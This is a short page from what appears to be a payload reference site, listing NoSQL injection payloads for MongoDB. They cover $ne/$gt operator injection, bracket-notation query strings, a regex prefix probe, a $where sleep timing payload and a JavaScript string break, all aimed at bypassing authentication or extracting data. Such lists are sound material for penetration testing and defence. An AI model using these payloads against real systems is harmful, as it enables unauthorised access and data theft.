vulns.co
/
GKData.io MCP

Back to Payloads

NoSQL Injection

MongoDB and friends. Use operator injection in JSON bodies and bracket notation in query strings to bypass auth or exfiltrate via boolean/regex conditions.

Tags: nosqli, mongodb, auth-bypass

Controlled probes

  • {"username": {"$ne": null}, "password": {"$ne": null}}
  • {"username": "admin", "password": {"$gt": ""}}
  • username[$ne]=1&password[$ne]=1
  • username[$regex]=^adm&password[$ne]=1
  • {"$where": "sleep(5000)"}
  • ';return true;var x='

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection